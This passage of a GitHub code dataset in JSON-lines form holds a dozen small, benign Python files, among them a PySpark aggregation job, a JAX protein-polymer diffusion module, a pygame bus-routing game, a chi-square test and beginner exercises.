falserate=(falsepositive+falsenegative)/2\n tr=truerate*10/(truerate+falserate)\n fr=falserate*10/(truerate+falserate)\n return tr,fr\n","repo_name":"asifahmed0021/unsupervised-fake-news-detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9771662646","text":"import datetime\nfrom pyspark.sql import DataFrame, SparkSession\nfrom pyspark.sql.functions import avg, col, size, split, round\nfrom aggregation import variables as V\nfrom common.utils import get_date_partition, add_imported_at\n\n\ndef main(df_reviews: DataFrame,\n df_business: DataFrame,\n df_checkins: DataFrame,\n execution_date: datetime.datetime,\n spark: SparkSession):\n \"\"\"\n :param df_reviews:\n :param df_business:\n :param df_checkins:\n :param execution_date:\n :param spark:\n :return:\n \"\"\"\n df_business_unique = _get_unique_business(df_business, spark)\n df_business_unique.persist()\n df_review_agg = _aggregate_avg_stars(df_reviews)\n df_star_business = 
_join_business(df_review_agg, df_business_unique)\n    df_star_business = add_imported_at(df_star_business, get_date_partition(execution_date))\n    df_checkin = _checkin_business(df_checkins)\n    df_checkin_business = _join_business(df_checkin, df_business_unique)\n\n    return df_star_business.select(V.COLUMNS_STAR_BUSINESS), df_checkin_business.select(V.COLUMNS_CHECKIN_BUSINESS)\n\n\ndef _aggregate_avg_stars(df_reviews: DataFrame):\n    \"\"\"\n    Averages review stars per business and week, rounded to two decimals.\n\n    :param df_reviews: reviews dataframe (business_id, week, stars)\n    :return: dataframe with business_id, week and avg_stars\n    \"\"\"\n    return df_reviews.groupBy(\"business_id\", \"week\") \\\n        .agg(round(avg(\"stars\"), 2).alias(\"avg_stars\"))\n\n\ndef _get_unique_business(df_business: DataFrame, spark: SparkSession):\n    \"\"\"\n    Deduplicates the business table on its descriptive columns.\n\n    :param df_business: raw business dataframe\n    :param spark: active SparkSession\n    :return: one row per distinct business\n    \"\"\"\n    df_business.createOrReplaceTempView(\"business\")\n    return spark.sql(\"\"\"\n    select business_id, \n           name,\n           address,\n           stars,\n           city,\n           state,\n           categories,\n           postal_code,\n           is_open\n    from business group by 1,2,3,4,5,6,7,8,9\n    \"\"\")\n\n\ndef _checkin_business(df_checkins: DataFrame):\n    \"\"\"\n    Adds a checkin_count column by counting the comma-separated check-in dates.\n\n    :param df_checkins: check-in dataframe (business_id, date)\n    :return: dataframe with an extra checkin_count column\n    \"\"\"\n    return df_checkins.withColumn(\"checkin_count\", size(split(col(\"date\"), \",\")))\n\n\ndef _join_business(df: DataFrame, df_business: DataFrame):\n    \"\"\"\n    Inner-joins a dataframe with the deduplicated business table on business_id.\n\n    :param df: left-hand dataframe carrying a business_id column\n    :param df_business: deduplicated business dataframe\n    :return: joined dataframe\n    \"\"\"\n    return df.join(df_business, on=[\"business_id\"], how=\"inner\")\n","repo_name":"maheshkalani/newyorker-assignment","sub_path":"newyorker/aggregation/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"24461580413","text":"import os\nimport torch\nimport argparse\n\n\ndef _export(state_dict, component, destination, stem):\n    torch.save(state_dict[component], os.path.join(destination, stem + '_' + component + '.pth'))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('checkpoint_file', type=str, help='Checkpoint file to convert (.pth file)')\n    parser.add_argument('destination', type=str, help='Directory to save exported weights to')\n    parser.add_argument('--export_optim', action='store_true', help='Flag for exporting optimizer state dict')\n    parser.add_argument('--export_sched', action='store_true', help='Flag for exporting scheduler state dict')\n    args = parser.parse_args()\n\n    # Set up destination and get file stem\n    os.makedirs(args.destination, exist_ok=True)\n    stem = os.path.splitext(os.path.basename(args.checkpoint_file))[0]\n    state_dict = torch.load(args.checkpoint_file)\n\n    # Export individual state dicts\n    _export(state_dict, 'model', args.destination, stem)\n    if args.export_optim:\n        _export(state_dict, 'optimizer', args.destination, stem)\n    if args.export_sched and state_dict['scheduler'] is not None:\n        _export(state_dict, 'scheduler', args.destination, stem)\n    print('Exported checkpoint to', args.destination)\n","repo_name":"haydengunraj/pytorch_training_tools","sub_path":"checkpoint2weights.py","file_name":"checkpoint2weights.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"23319761494","text":"'''\nCalculator 2\n'''\nimport sys\nsys.stdin = open('C:/Users/SSAFY/Downloads/input.txt','r')\n\nfor tc in range(1,11):\n    n = int(input())\n    text = input()\n\n    stack = []\n    susik = ''\n    for x in text:\n        if x not in '+*':\n            susik += x\n        else:\n            if x == '+':\n                if stack: # if the stack is non-empty\n                    while stack: # pop everything: stacked operators have equal or higher precedence\n                        susik += 
stack.pop()\n                    stack.append(x) # push the operator once the stack is drained\n                else: # empty stack: just push\n                    stack.append(x)\n\n            else:\n                if len(stack) == 0: # empty stack: push\n                    stack.append(x)\n                elif stack[-1] == '+': # '+' on top has lower precedence, so push\n                    stack.append(x)\n                else: # '*' on top: pop it before pushing (equal precedence)\n                    susik += stack.pop()\n                    stack.append(x)\n    if stack:\n        for i in stack[::-1]:\n            susik += i\n\n\n    # evaluate the postfix expression\n    stack = []\n    for x in susik:\n        if x not in '+*':\n            stack.append(x)\n        else:\n            op2 = stack.pop()\n            op1 = stack.pop()\n            if x == '+':\n                stack.append(int(op1)+int(op2))\n            else:\n                stack.append(int(op1)*int(op2))\n\n    print(f'#{tc} {stack[0]}')","repo_name":"YUNA-AHN/TIL","sub_path":"02_Algorithm/13_Queue/13_DAY_1223.py","file_name":"13_DAY_1223.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"45678105525","text":"import base\nfrom tornado.web import authenticated\nfrom tlog.base.team import Teams\n\nclass Handler(base.Handler):\n\n    @authenticated\n    def get(self):\n        teams = Teams.get()\n        self.render(\n            'teams.html', \n            title='Teams',\n            teams=teams,\n        )","repo_name":"thomaserlang/TLog","sub_path":"src/tlog/web/handlers/teams.py","file_name":"teams.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"41443943218","text":"\"\"\"Chroma learns to reverse a correlated diffusion process which respects the chain and density constraints that\nalmost all structures satisfy. This allows the model to focus most of its capacity on non-trivial dependencies. This\nsection implements the polymer-structured diffusions: multivariate Gaussian distributions for protein structures that\n(i) are SO(3) invariant, (ii) enforce protein chain and radius of gyration statistics, and (iii) can be computed in\nlinear time. This module implements various functions for the polymer-structured diffusion and utility functions that\ncompute key metrics such as radius of gyration.\"\"\"\n\n# Dependencies\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\n\n# Constants for diffusion schedule (Song et al. 2021)\nB_MAX = 20\nB_MIN = 0.1\n\n\ndef diffuse(noise, R, x0, timestep):\n    \"\"\"This method diffuses the coordinates of the polymer up to the given time. The diffusion\n    is integrated forward in time according to the following formula:\n    x_t = sqrt(alpha_t)*x0 + sqrt(1-alpha_t)*matmul(R,z) where z follows multivariate normal.\n    Args:\n        noise: noise (z) that follows z ~ N(0, I) of shape [N_atoms, 3]\n        R: square root of the covariance matrix\n        x0: a matrix of size [N_atoms, 3]\n        timestep: the timestep between [0, 1] where 0 is the data and 1 is noise.\n    Returns:\n        noised coordinates of shape [N_atoms, 3]\n    TODO: implement mean deflation\n    (unit-tested)\"\"\"\n    # Get alpha_t from diffusion schedule\n    alpha_t = get_alpha_t(timestep)\n    one_m_alpha_t = get_stable_1malpha(timestep) # numerically stable implementation of (1 - alpha_t)\n    rz = jnp.matmul(R, noise) # Compute prior rz\n\n    # Diffusion Step\n    x_t = jnp.sqrt(alpha_t) * x0 + jnp.sqrt(one_m_alpha_t) * rz\n    return x_t\n\n\ndef ideal_covariance(z, gamma, delta):\n    \"\"\"This method computes the matmul(R, z) for the ideal chain covariance model. 
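# Illustrative sketch (not from the source record): the conversion above
# hard-codes the '+' vs '*' cases; a precedence table turns it into the
# general shunting-yard loop. Assumes single-character operands, as in the
# exercise input.
PREC = {'+': 1, '*': 2}

def to_postfix(expr):
    out, ops = [], []
    for ch in expr:
        if ch not in PREC:
            out.append(ch)  # operand: emit immediately
        else:
            while ops and PREC[ops[-1]] >= PREC[ch]:
                out.append(ops.pop())  # pop equal/higher precedence first
            ops.append(ch)
    out.extend(reversed(ops))  # flush remaining operators
    return ''.join(out)

assert to_postfix('3+4*5') == '345*+'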
For the formula, see section C.2\n 'Covariance model #1: Ideal Chain' in Chroma Paper.\n Args:\n z: noise samples from z ~ N(0, I) of shape x0.shape\n n_atoms: number of atoms in chain\n gamma: length scale of the chain\n delta: amount of allowed translational noise about the origin\n (unit-tested)\"\"\"\n n_atoms = z.shape[0]\n cu_z = gamma * jnp.cumsum(z, axis=0) # cumulative z\n constant_terms = delta * cu_z[0] - (1 / n_atoms) * (jnp.sum(cu_z))\n rz = cu_z + constant_terms\n return rz\n\n\ndef rg_confined_covariance(n_atoms, a, b):\n \"\"\"This method computes the matmul(R, z) for the Rg-confined, linear-time Polymer MVNs. For the construction of\n the R matrix, see section C.3 'Covariance model #2: Rg-confined, linear-time Polymer MVNs' in the Chroma Paper.\n Args:\n n_atoms: number of atoms in protein\n a: a global scale parameter setting the 'segment length' of polymer\n b: a 'decay' parameter which sets the memory of the chain to fluctuations\n Returns:\n (unit-tested)\"\"\"\n # Construct Rg confined covariance matrix\n b_vec = b ** (np.arange(n_atoms)) # [N_at,]\n\n rows = []\n v = 1 / (np.sqrt(1 - b ** 2))\n for i in range(len(b_vec)):\n row = np.flip(b_vec[:len(b_vec) - i])\n row[0] = row[0] * v # Multiplying v with the first element, jnp.at for updates\n padded_row = np.pad(row, (0, i))\n rows.append(padded_row)\n rows.reverse()\n R = a * np.stack(rows, axis=0)\n R_inverse = np.linalg.inv(R)\n return R, R_inverse\n\n\ndef get_alpha_t(t):\n \"\"\"Returns the alpha_t value that is equivalent to the perturbation kernel used in Song et al. 2021\"\"\"\n x = -(1/2) * (t**2) * (B_MAX - B_MIN) - t * B_MIN\n return jnp.exp(x)\n\n\ndef get_stable_1malpha(t):\n \"\"\"Numerically stable implementation of (1-alpha_t) with the stable jnp.expm1 primitive.\"\"\"\n x = -(1 / 2) * (t ** 2) * (B_MAX - B_MIN) - t * B_MIN\n return - jnp.expm1(x)\n\n\ndef get_beta_t(t):\n \"\"\"Returns the ß(t) value that is used in the SDEs. The ß(t) schedule is the same as that used in\n Song et al. 2021.\"\"\"\n return B_MIN + t * (B_MAX - B_MIN)\n\n\ndef SNR(t):\n return get_alpha_t(t) / get_stable_1malpha(t)\n\n\ndef compute_b(N, B, a):\n \"\"\"This method computes b given the global scaling factor a. See section C.3.2 in Chroma Paper for the derivation\n of the formula. The derivation makes a power law approximation for the radius of gyration in the form r*(N**v)\n where r is a prefactor and v is the Flory coefficient. The values of r and v are taken from Tanner (2016) in the\n paper 'Empirical power laws for the radii of gyration of protein oligomers.' The experimentally determined values\n are: prefactor r = 2 Angstroms (0.2 nanometers) and v = 0.4. Tanner (2016) showed that the v of oligomers was\n almost identical to that of monomers which is 0.4. Since this function uses n_atoms as its input, the r is rescaled\n to 1.148698355.\n Args:\n N: number of residues in the protein\n B: number of atoms per residue\n a: global scale factor that determines the 'segment length' of the polymer\n \"\"\"\n # (See Tanner, 2016)\n n_atoms = N * B\n r = (2.0 / np.sqrt(3)) / (B ** 0.4) # r is an experimentally determined prefactor with value 2.0 Angstroms but is\n # scaled to this value when n_atoms are used. 
Also, the segment length 'a' of 3.8 Angstroms is scaled with\n # sqrt(3) so r has to be scaled with the same number to keep b invariant\n v = 0.4 # narrow range between 0.38-0.40, taken to be 0.40 (See Tanner, 2016)\n b_effective = 3 / n_atoms + (n_atoms ** (-v)) * np.sqrt(\n n_atoms ** (2 * v - 2) * (n_atoms ** 2 + 9) - ((a ** 2) / (r ** 2)))\n return b_effective\n\n\ndef deflate_mean(x, xi):\n \"\"\"This method implements the mean-deflation operation that re-tunes the translational variance of each chain.\n Args: x: the atom coordinates (N, 3) xi: set based on pile-of-globs or glob-of-globs covariance modes.\n Pile-of-globs: set xi so that the translational variance of each chain is unity. This will cause chains to have a\n realistic radius of gyration but pile up at the origin. Glob-of-globs covariance: set xi per chain by solving for\n the translational variance that also implements the correct whole-complex Rg scaling as a function of the number\n of residues.\n \"\"\"\n pass\n\n\ndef compute_radius_of_gyration(coordinates):\n \"\"\"This method computes the radius of gyration given the coordinates of all atoms.\n Formula from Tanner, 2016:\n Rg = sqrt(sum_over_i(r_i - r_o)/n_atoms) where r_o = sum_over_i(r_i) / n_atoms\n Args:\n coordinates: a matrix of size (N, 3) where N is the number of atoms in complex\n (unit-tested)\"\"\"\n r_o = jnp.average(coordinates, axis=0)\n squared_residuals = jnp.sum(((coordinates - r_o) ** 2), axis=1)\n rg = jnp.sqrt(jnp.average(squared_residuals, axis=0))\n return rg\n","repo_name":"ardagoreci/Chroma","sub_path":"model/polymer.py","file_name":"polymer.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"39543719151","text":"import pytest\n\nfrom exercise_28_join_numbers.exercise_28_join_numbers import join_numbers\nfrom exercise_28_join_numbers.exercise_28_join_ten_numbers import join_ten_numbers\n\n\n@pytest.mark.parametrize(('seq', 'string'), [\n (range(15), '0,1,2,3,4,5,6,7,8,9,10,11,12,13,14'),\n (range(10, 15), '10,11,12,13,14'),\n (range(0), '')\n])\ndef test_join_numbers(seq, string):\n assert join_numbers(seq) == string\n\n\n@pytest.mark.parametrize(('seq', 'string'), [\n (range(15), '0,1,2,3,4,5,6,7,8,9,10'),\n (range(10, 15), '10'),\n (range(0), '')\n])\ndef test_join_ten_numbers(seq, string):\n assert join_ten_numbers(seq) == string\n","repo_name":"RubanovDmitriy/Python_Workout_50_Essential_Exercises_by_Reuven_M_Lerner","sub_path":"exercise_28_join_numbers/test_ex28.py","file_name":"test_ex28.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70397387002","text":"\n\n# Write a program that asks for an integer n,\n# then it creates a two-dimensional array (of integers) of the specified\n# size (nxn) with the value of 1 on the main diagonal and the value of 0\n# everywhere else. 
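# Illustrative sketch (not from the source record): end-to-end use of the
# polymer diffusion above -- build the Rg-confined R, sample z ~ N(0, I),
# diffuse clean coordinates to time t, then check the radius of gyration.
# N, B and a are arbitrary example values (a must be large enough that
# compute_b returns b < 1); assumes the functions above are in scope.
import jax
import jax.numpy as jnp

key = jax.random.PRNGKey(0)
k1, k2 = jax.random.split(key)

N, B, a = 16, 4, 2.0                   # residues, atoms per residue, scale
n_atoms = N * B
b = compute_b(N, B, a)                 # decay consistent with Rg scaling
R, _ = rg_confined_covariance(n_atoms, a, b)

x0 = jax.random.normal(k1, (n_atoms, 3))   # stand-in "clean" structure
z = jax.random.normal(k2, (n_atoms, 3))
x_t = diffuse(z, jnp.asarray(R), x0, timestep=0.5)
print(compute_radius_of_gyration(x_t))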
Print the 2d array into the output\n#\n# Example:\n#\n# Please enter the array (matrix) size: 4\n# 1 0 0 0\n# 0 1 0 0\n# 0 0 1 0\n# 0 0 0 1\n\nm = int(input(\"please enter the row :\"))\nn = int(input(\"please enter the cols :\"))\n\nfor i in range(1, m+1):\n for j in range(1, n+1):\n if i==j:\n print(1, end=\" \")\n else:\n print(0, end=\" \")\n print(\"\\r\")\n\n\n","repo_name":"Sthakur19/python-greenfox","sub_path":"list/diagonal_matrix.py","file_name":"diagonal_matrix.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9885570630","text":"height = eval(input(\"Enter the height of the triangle:\\n\"))\r\nnum=1\r\ncount=0\r\nfor i in range((2*height-1),0,-1):\r\n print(\" \"*(height-count-1),\"*\"*num,sep=\"\")\r\n num+=2\r\n count+=1\r\n if count==height:\r\n break\r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/klsada002/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1729315932","text":"import pygame\nfrom pygame.locals import *\nimport time\nimport threading\nfrom Main import Main\nfrom Mapping import Mapping\n\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nLIGHTGREEN = (76, 153, 0)\nDARKGREEN = (0, 102, 0)\nYELLOW = (255, 196, 0)\nORANGE = (255, 128, 0)\nRED = (255, 0, 0)\nBLUE = (22,118,186)\n\nMAPRED = Mapping.getMapping('red')\nMAPBLUE = Mapping.getMapping('blue')\n\nx_coordb = [755, 700, 670, 625, 685, 740, 780, 840, 785, 670, 595, 560, 505, 400, 320, 245, 230, 200, 180, 300, 380, 400, 300, 318, 420, 510, 580, 700, 800]\ny_coordb = [-490, -380, -290, -180, -120, -40, 40, 120, 205, 230, 225, 335, 420, 360, 360, 310, 210, 60, -10, -40, -90, -135, -225, -305, -398, -470, -530, -575, -560]\nanglesb = [-45, -20, -20, -42, 55, 10, 40, 20, -55, -90, -55, 0, -55, 230, -45, 180, 190, 180, 120, 120, 120, 230, 230, 135, 125, 125, 125, 105, 45]\n\nangles = [45, 90, 105, 120, 125, 135, 230, 230, 120, 120, 180,185, 190,185, 200,-90, -55, 0, -55, -90, -55, 20, 40, 10, 55, -42, -20, -20, -45]\nx_coord = [800,750, 700,640, 520, 345, 325, 420, 360, 260, 220, 260, 265,270, 265,395,505, 590, 595, 670, 785, 880, 805, 765, 685, 685, 710,730, 785]\ny_coord = [-560, -570, -575, -540, -490, -335, -245, -135, -70, -20, 20, 185, 250,345, 400, 470, 420, 335, 225, 220, 205, 120, 65, -40, -120, -205, -330, -430, -510]\n\nx_prog = [150, 95, 100, 225, 363, 471, 479, 428, 418, 464, 414, 294,155]\ny_prog = [355, 482, 560, 653, 564, 503, 432, 329, 239, 154, 74, 108,220]\n\nx_progb = [721, 719, 771, 851,1030, 982, 1011, 1046, 921, 787, 684, 652]\ny_progb = [360, 282, 180, 119,148, 246, 370, 494, 553, 542, 539, 434]\n\n\nclass frontEnd:\n\n def __init__(self):\n \n pygame.init()\n #FONT AND TEXT FOR WELCOME SCREEN\n self.font = pygame.font.SysFont(\"phosphate\", 23)\n self.text = self.font.render(\"Click to Start\", True, (230, 179, 14))\n # Set the height and width of the screen\n self.w, self.h = 1200, 750\n self.screen = pygame.display.set_mode([self.w,self.h])\n pygame.display.set_caption(\"Game Screen\")\n # load logo\n self.loadLogo()\n # load Red Map\n self.loadRedMap()\n # load blue Map\n self.loadBlueMap()\n # load bus image\n self.loadBus()\n self.backEnd = Main()\n # Loop until the user clicks the close button.\n self.done = False\n self.page = 1\n # load + image\n self.loadAdd()\n self.totalCost = 0\n\n 
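# Illustrative sketch (not from the source record): the exercise statement
# above asks for a single integer n (an n x n identity matrix), while the
# loop version reads rows and cols separately; with numpy the whole array
# is one call. A hedged alternative, using a fixed example size instead of
# input().
import numpy as np

n = 4
print(np.eye(n, dtype=int))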
def loadLogo(self):\n #SETTING FOR LOGO \n self.logo = pygame.image.load('logo.png')\n self.logo.convert()\n self.rectLogo = self.logo.get_rect()\n self.rectLogo.center = self.w//2, (self.h-50)//2\n\n def loadAdd(self):\n #SETTING FOR ADD\n self.add = pygame.image.load('plus.png')\n self.add.convert()\n self.rectAdd = self.add.get_rect()\n self.rectAdd.center = (self.w-195)//2, (self.h+530)//2\n self.rectAdd2 = self.add.get_rect()\n self.rectAdd2.center = (self.w+945)//2, (self.h+530)//2\n\n def loadRedMap(self):\n #SETTING FOR RED MAP\n self.redMap = pygame.image.load('red1.png')\n self.redMap.convert()\n self.rectRed = self.redMap.get_rect()\n self.rectRed.center = (self.w-575)//2, (self.h)//2\n\n def loadBlueMap(self):\n #SETTING FOR BLUE MAP\n self.blueMap = pygame.image.load('blue1.png')\n self.blueMap.convert()\n self.rectBlue = self.blueMap.get_rect()\n self.rectBlue.center = (self.w+575)//2, (self.h)//2\n\n def loadBus(self):\n #SETTING FOR BUS\n\n #SPAWN THE BUS EVERY TIME AT\n # x = w + 800\n # y = h - 560\n # speed = 50\n # angle = 45\n\n self.busImg = pygame.image.load('bussmol.png')\n self.busImg.convert()\n self.busRect = self.busImg.get_rect()\n self.speed = 50\n self.transparent = (0, 0, 0, 0)\n\n def move_bus(self,image, speed, x, y, angle):\n\n def rot_center(image, angle):\n center = image.get_rect().center\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(center = center)\n return rotated_image, new_rect\n\n image, n = rot_center(image, angle)\n\n x += speed\n y += speed\n\n rect3 = self.busImg.get_rect()\n rect3.center = x//2, y//2\n\n self.screen.blit(image, rect3)\n\n return image\n\n def pageLoop(self):\n # -------- Page Loop -----------\n i = 0\n initHandle = True\n while not self.done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n elif initHandle:\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.page += 1\n if self.page == 3:\n initHandle = False\n else:\n if event.type == pygame.MOUSEBUTTONDOWN:\n x, y = event.pos\n if ((x <= 524) and (x >= 477)) and ( (y <= 660) and ( y>= 615) ) :\n self.backEnd.addBus('red')\n elif ((x <= 1095) and (x >= 1048)) and ( (y <= 660) and ( y>= 615) ):\n self.backEnd.addBus('blue')\n elif x <= (self.w)//2+70 and x >= self.w//2-70 and y >= (self.h+710)//2-25 and y <= (self.h+710)//2+25:\n self.renderPage4()\n self.page = 4\n print(self.totalCost)\n \n # Set the screen background\n self.screen.fill(BLACK)\n \n if self.page == 1:\n # page 1\n self.renderPage1()\n\n elif self.page == 2:\n # page 2\n self.renderPage2()\n \n elif self.page == 3:\n # page 3\n self.renderPage3(i)\n i+=1\n \n\n def renderPage1(self):\n # page 1\n self.screen.fill(BLACK)\n\n #replace img,rect with logo,rectLogo appropriately\n self.screen.blit(self.logo, self.rectLogo)\n self.screen.blit(self.text,(615 - self.text.get_width() // 2, 410 - self.text.get_height() // 2))\n pygame.display.update()\n\n def renderPage2(self):\n\n # page 2\n pygame.draw.rect(self.screen, YELLOW, (200, 200,830,350), 2)\n \n\n self.text = self.font.render(\"WELCOME TO BUSy\", True, BLUE)\n self.screen.blit(self.text, [520, 230])\n self.text = self.font.render(\"The goal of this Game is to get the lowest cost possible.\", True, WHITE)\n self.screen.blit(self.text, [290, 280])\n self.text = self.font.render(\"The cost is increased as you add more buses due \", True, WHITE)\n self.screen.blit(self.text, [330, 310])\n self.text = self.font.render(\"to the increase in carbon footprint. 
The progress bar indicates\", True, WHITE)\n self.screen.blit(self.text, [250, 340])\n self.text = self.font.render(\"the number of people waiting at the bus stop - dark green indicating\", True, WHITE)\n self.screen.blit(self.text, [230, 370])\n self.text = self.font.render(\"least people and red indicating most people. The cost also increases\", True, WHITE)\n self.screen.blit(self.text, [230, 400])\n self.text = self.font.render(\"as more and more people wait at the bus stop.\", True, WHITE)\n self.screen.blit(self.text, [380, 430])\n self.text = self.font.render(\"NOTE - EACH BUS WILL RUN 5 FOR ROUNDS AND AUTOMATICALLY TERMINATE\", True, WHITE)\n self.screen.blit(self.text, [240, 490])\n pygame.display.update()\n\n def drawFullBar(self,xCoord,yCoord,fractionFull):\n if fractionFull>0.8:\n Color = RED\n elif fractionFull>0.6:\n Color = ORANGE\n elif fractionFull>0.4:\n Color = YELLOW\n elif fractionFull>0.2:\n Color = LIGHTGREEN\n else:\n Color = DARKGREEN\n\n pygame.draw.rect(self.screen, Color, (xCoord,yCoord,50,15), 2)\n pygame.draw.rect(self.screen, Color, (xCoord,yCoord,int(50*fractionFull),15))\n\n def drawBusBlue(self,i):\n self.move_bus(self.busImg,self.speed,self.w+x_coordb[i],self.h+y_coordb[i], anglesb[i]+180)\n\n def drawBusRed(self,i):\n self.move_bus(self.busImg,self.speed,30 + x_coord[i],self.h+y_coord[i], angles[i])\n\n def renderPage3(self,i):\n self.screen.fill(BLACK)\n # img1/img2 replace by red/blue\n self.screen.blit(self.redMap, self.rectRed)\n self.screen.blit(self.blueMap, self.rectBlue)\n self.screen.blit(self.add,self.rectAdd)\n self.screen.blit(self.add,self.rectAdd2)\n pygame.draw.rect(self.screen, (255,255,255), ((self.w)//2-70, (self.h +710)//2-25,140,50))\n self.fin = self.font.render(\"FINISH!\", True, (0, 0, 0))\n\n self.rectAddfin = self.fin.get_rect()\n self.rectAddfin.center = (self.w)//2, (self.h + 710 )//2\n\n self.screen.blit(self.fin, self.rectAddfin)\n\n busStopsRed = self.backEnd.getBusStops('red')\n\n for x,stop in enumerate(busStopsRed):\n self.drawFullBar(x_prog[x],y_prog[x],stop.currentCapacity/stop.maxCapacity)\n\n busStopsBlue = self.backEnd.getBusStops('blue')\n for x,stop in enumerate(busStopsBlue):\n self.drawFullBar(x_progb[x],y_progb[x],stop.currentCapacity/stop.maxCapacity)\n\n busesred = self.backEnd.getActiveBuses('red')\n\n for bus in busesred:\n i = MAPRED[bus.currentLocation]\n self.drawBusRed(i)\n\n busesblue = self.backEnd.getActiveBuses('blue')\n\n for bus in busesblue:\n i = MAPBLUE[bus.currentLocation]\n self.drawBusBlue(i)\n # add for loop to render the buses\n # add for loop to render the fullness bars\n # for x in range(len(x_progb)):\n \n\n # for x in range(len(x_prog)):\n # self.drawFullBar(x_prog[x],y_prog[x],0.75)\n self.totalCost += self.backEnd.step()\n\n self.text = self.font.render(\"Total Cost: \"+str(self.totalCost), True, (230, 179, 14))\n\n self.rectAddf = self.text.get_rect()\n self.rectAddf.center = (self.w)//2, (self.h -710 )//2\n\n self.screen.blit(self.text, self.rectAddf)\n\n\n\n # self.drawFullBar(851,119,0.75)\n pygame.time.wait(500)\n pygame.display.update()\n\n\n def renderPage4(self):\n self.screen.fill(BLACK)\n \n self.text = self.font.render(\"THANK YOU!\", True, (255, 255, 255))\n self.rectAddt = self.text.get_rect()\n self.rectAddt.center = (self.w)//2, (self.h)//2\n\n self.screen.blit(self.text, self.rectAddt)\n\n self.textc = self.font.render(\"Total Cost: \"+str(self.totalCost), True, (255, 255, 255))\n self.rectAddc = self.textc.get_rect()\n self.rectAddc.center = (self.w)//2, (self.h - 
100)//2\n\n self.screen.blit(self.textc, self.rectAddc)\n\n pygame.display.update()\n \n\n \nif __name__ == \"__main__\":\n a= frontEnd()\n a.pageLoop()\n \n","repo_name":"swakv/BUS-ROUTING-GAME","sub_path":"frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":11172,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"1907463721","text":"import numpy as np\r\nimport pandas as pd\r\nimport scipy as sp\r\nfrom scipy.stats import chi2\r\nfrom scipy.stats import chi2_contingency\r\n\r\ncrD=pd.read_csv('D:\\Courses\\BSE-BI\\BSE\\BSE\\Statistics-II\\Chi-Square\\Codes\\Dataset\\Credit.csv',header=\"infer\")\r\nprint(crD.shape)\r\n#Find frequency of a continuous column in discrete bins\r\nfor cols in crD.columns:\r\n print(cols)\r\nfreq=crD['Income'].value_counts(bins=4)\r\nprint(freq)\r\n\r\n#chi square test for independence\r\nctab=pd.crosstab(crD.Defaultee, pd.cut(crD.Income, [10,54.424,98.494,142.564,186.634], include_lowest=True), margins=False)\r\nprint(ctab)\r\nstat, p, dof, expected=chi2_contingency(ctab)\r\nprob=0.95\r\ncritical=chi2.ppf(prob,dof)\r\nif(abs(stat)>=critical):\r\n print('Dependent (Reject H0)')\r\nelse:\r\n print('Independent (Accept H0)')","repo_name":"manishbhnau/Repo","sub_path":"credit_chi2_independence.py","file_name":"credit_chi2_independence.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2615506684","text":"\"\"\"\nDay 2: I Was Told There Would Be No Math\n\n--- Part 1 ---\n\nThe elves are running low on wrapping paper, and so they need to submit\nan order for more. They have a list of the dimensions (length l,\nwidth w, and height h) of each present, and only want to order exactly\nas much as they need.\n\nFortunately, every present is a box (a perfect right rectangular\nprism), which makes calculating the required wrapping paper for each\ngift a little easier: find the surface area of the box, which is\n2*l*w + 2*w*h + 2*h*l. The elves also need a little extra paper for\neach present: the area of the smallest side.\n\nAll numbers in the elves' list are in feet. How many total square feet\nof wrapping paper should they order?\n\n--- Part Two ---\n\nThe elves are also running low on ribbon. Ribbon is all the same width,\nso they only have to worry about the length they need to order, which\nthey would again like to be exact.\n\nThe ribbon required to wrap a present is the shortest distance around\nits sides, or the smallest perimeter of any one face. Each present also\nrequires a bow made out of ribbon as well; the feet of ribbon required\nfor the perfect bow is equal to the cubic feet of volume of the\npresent. 
